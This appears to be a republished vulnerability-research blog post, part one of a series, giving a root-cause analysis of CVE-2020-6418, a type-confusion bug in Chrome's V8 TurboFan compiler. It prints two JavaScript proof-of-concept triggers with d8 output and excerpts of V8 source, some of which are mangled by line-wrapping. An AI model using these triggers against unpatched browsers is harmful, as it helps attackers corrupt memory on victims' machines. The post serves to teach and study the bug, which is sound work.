Introduction:
Chrome vulnerabilities have been quite a hot topic for the past couple of years. A lot of vulnerabilities where caught being exploited in the wild. While most of the ones we looked at were quite interesting, one bug caught our attention and wanted to dig more deeply in: CVE-2020-6418.
Multiple parties published different blogposts about how to exploit this vulnerability. Nevertheless, we decided to go ahead and try to exploit it on Linux.
In this first part of the two-blogs-series, we will walk through the PoC developed along with a root-cause analysis of the vulnerability. Exploitation will be covered in the second part.
Analyzing the PoC:
The publicly available PoC:
CVE-2020-6418
PoC:
‘use strict’; (function() { var popped;
function trigger(new_target) { function inner(new_target) {
function constructor() {
popped = Array.prototype.pop.call(array); for (var i = 0; i < 0x10000; ++i) {};
}
var temp = array[0];
for (var i = 0; i < 0x10000; ++i) {};
return Reflect.construct(constructor, arguments, new_target);
}
inner(new_target); }
var array = new Array(0, 0, 0, 0, 0);
for (var i = 0; i < 20000; i++) { trigger(function() { }); array.push(0);
for (var i = 0; i < 0x10000; ++i) {};
}
var proxy = new Proxy(Object, {
get: () => (array[4] = 1.1, Object.prototype)
});
trigger(proxy);
print(popped); }());
Unfortunately, running this PoC on the affected V8 version does not trigger due to pointer compression.
After investigating the patch commit of the vulnerability, we noticed a regression test for the bug along with a patched file in turbofan
let a = [0, 1, 2, 3, 4];
function empty() {}
function f(p) {
return a.pop(Reflect.construct(empty, arguments, p));
CVE-2020-6418 Introduction2}
let p = new Proxy(Object, {
get: () => (a[1] = 99999999.235434351, Object.prototype)
});
function main(p) { print(f(p));
}
%PrepareFunctionForOptimization(empty);
%PrepareFunctionForOptimization(f);
%PrepareFunctionForOptimization(main);
main(empty);
main(empty);
%OptimizeFunctionOnNextCall(main);
main(p);
The regression test (PoC) we developed was:
┌──(kali㉿kali)-[~/Desktop/x64.release]
└─$ ./d8 –allow-natives-syntax ../poc.js
4
3
-25654566
lock-type=
Root-Cause-Analysis:
Starting with our PoC, we noticed that the bug is a JIT bug which allows us to utilize build-in functions such as push, pop, shift, etc that is in a JSArray which were compiled using the specific elements of the same time that it was JIT’ed for.
In the PoC, the variable a is declared as an int array with values [1,2,3,4] which means that the V8 will create an array with elements of type: PACKED_SMI_ELEMENTS which is just an array of small integers in V8 terminology.
When the function f was JIT’ed, the proxy object that intercepts access changed the type of the array from PACKED_SMI_ELEMENTS to PACKED_DOUBLE_ELEMENTS which is a different array layout. This is where the type confusion occurs; when the ‘pop’ function is called, it considers the array PACKED_SMI_ELEMENTS instead of its new type PACKED_DOUBLE_ELEMENTS.
We can deduce that the bug occurs because TurboFan does not account for the change of the elements type for the array and assumed that the array’s type will never change based on the context of the function and the type of feedback. To even understand the bug further, lets take a look how TurboFan optimizes JSArray built-in functions.
TurboFan Reduce built-in functions by building a graph of nodes that accomplish the same behavior of the original functions then compiles it to machine code at a later stage.
v8\src\compiler\js-call-reducer.cc
Reduction JSCallReducer::ReduceJSCall(Node* node,
const SharedFunctionInfoRef& shared) {
DCHECK_EQ(IrOpcode::kJSCall, node->opcode());
Node* target = NodeProperties::GetValueInput(node, 0);
// Do not reduce calls to functions with break points. if (shared.HasBreakInfo()) return NoChange
();
// Raise a TypeError if the {target} is a “classConstructor”. if (IsClassConstructor(shared.kind
())) {
NodeProperties::ReplaceValueInputs(node, target); NodeProperties::ChangeOp(
node, javascript()->CallRuntime( Runtime::kThrowConstructorNonCallableError, 1));
return Changed(node); }
// Check for known builtin functions.
int builtin_id =
shared.HasBuiltinId() ? shared.builtin_id() : Builtins::kNoBuiltinId;
switch (builtin_id) {
case Builtins::kArrayConstructor:
return ReduceArrayConstructor(node); case Builtins::kBooleanConstructor:
// …. snip …
case Builtins::kArrayEvery:
return ReduceArrayEvery(node, shared); case Builtins::kArrayIndexOf:
return ReduceArrayIndexOf(node); case Builtins::kArrayIncludes:
return ReduceArrayIncludes(node); case Builtins::kArraySome:
return ReduceArraySome(node, shared); case Builtins::kArrayPrototypePush:
return ReduceArrayPrototypePush(node); case Builtins::kArrayPrototypePop:
return ReduceArrayPrototypePop(node);
Based on the built-in that is being used, turbofan will optimize it accordingly. In our case, the optimization occurs on the pop function:
// ES6 section 22.1.3.17 Array.prototype.pop ( )
Reduction JSCallReducer::ReduceArrayPrototypePop(Node* node) {
DisallowHeapAccessIf disallow_heap_access(should_disallow_heap_access());
// … snip …
Node* receiver = NodeProperties::GetValueInput(node, 1); Node* effect = NodeProperties::GetEffectI
nput(node); Node* control = NodeProperties::GetControlInput(node);
MapInference inference(broker(), receiver, effect); if (!inference.HaveMaps()) return NoChange();
MapHandles const& receiver_maps = inference.GetMaps();
std::vector<ElementsKind> kinds;
if (!CanInlineArrayResizingBuiltin(broker(), receiver_maps, &kinds)) {
return inference.NoChange(); }
// … snip …
// Load the “length” property of the {receiver}. Node* length = effect = graph()->NewNode(
simplified()->LoadField(AccessBuilder::ForJSArrayLength(kind)), receiver, effect, control);
// Check if the {receiver} has any elements.
Node* check = graph()->NewNode(simplified()->NumberEqual(), length,
jsgraph()->ZeroConstant()); graph()->NewNode(common()->Branch(BranchHint::kFalse), check, contro
l);
Node* if_true = graph()->NewNode(common()->IfTrue(), branch); Node* etrue = effect;
Node* vtrue = jsgraph()->UndefinedConstant();
Node* if_false = graph()->NewNode(common()->IfFalse(), branch); Node* efalse = effect;
Node* vfalse;
{
// TODO(tebbi): We should trim the backing store if the capacity is too // big, as implemented in
elements.cc:ElementsAccessorBase::SetLengthImpl.
// Load the elements backing store from the {receiver}. Node* elements = efalse = graph()->NewNode
(
simplified()->LoadField(AccessBuilder::ForJSObjectElements()), receiver, efalse, if_false);
// Ensure that we aren’t popping from a copy-on-write backing store. if (IsSmiOrObjectElementsKind
(kind)) {
elements = efalse = graph()->NewNode(simplified()->EnsureWritableFastElements(),
receiver, elements, efalse, if_false);
}
// Compute the new {length}.
length = graph()->NewNode(simplified()->NumberSubtract(), length,
jsgraph()->OneConstant());
// Store the new {length} to the {receiver}. efalse = graph()->NewNode(
simplified()->StoreField(AccessBuilder::ForJSArrayLength(kind)), receiver, length, efalse, if_fals
e);
// Load the last entry from the {elements}. vfalse = efalse = graph()->NewNode(
simplified()->LoadElement(AccessBuilder::ForFixedArrayElement(kind)), elements, length, efalse, if
_false);
// Store a hole to the element we just removed from the {receiver}. efalse = graph()->NewNode(
simplified()->StoreElement( AccessBuilder::ForFixedArrayElement(GetHoleyElementsKind(kind))),
elements, length, jsgraph()->TheHoleConstant(), efalse, if_false); }
control = graph()->NewNode(common()->Merge(2), if_true, if_false);
effect = graph()->NewNode(common()->EffectPhi(2), etrue, efalse, control); value = graph()->NewNod
e(common()->Phi(MachineRepresentation::kTagged, 2),
Node* branch =
// … snip … return Replace(value);
}
The function above is responsible for building a directed graph of edge and control nodes that can be chained with the original sea of nodes and produce the same result of calling the built-in function. This approach is dynamic and supports all kinds of change.
In order for TurboFan to recognize and infer the type of the object that is being targeted for optimization it traverses backwards from the current node to locate where the function got allocated:
MapInference inference(broker(), receiver, effect);
if (!inference.HaveMaps()) return NoChange(); MapHandles const& receiver_maps = inference.GetMaps
();
std::vector<ElementsKind> kinds;
if (!CanInlineArrayResizingBuiltin(broker(), receiver_maps, &kinds)) {
return inference.NoChange(); }
The above function attempts to infer the type of the object and this is where the bug will manifest.
Patch Confirmation:
In the next part, we’ll present the steps we used to exploit the type confusion vulnerability.
Stay tuned and as always, happy hunting!
原文始发于 Haboob Research Team:Exploring Chrome’s CVE-2020-6418 – Part1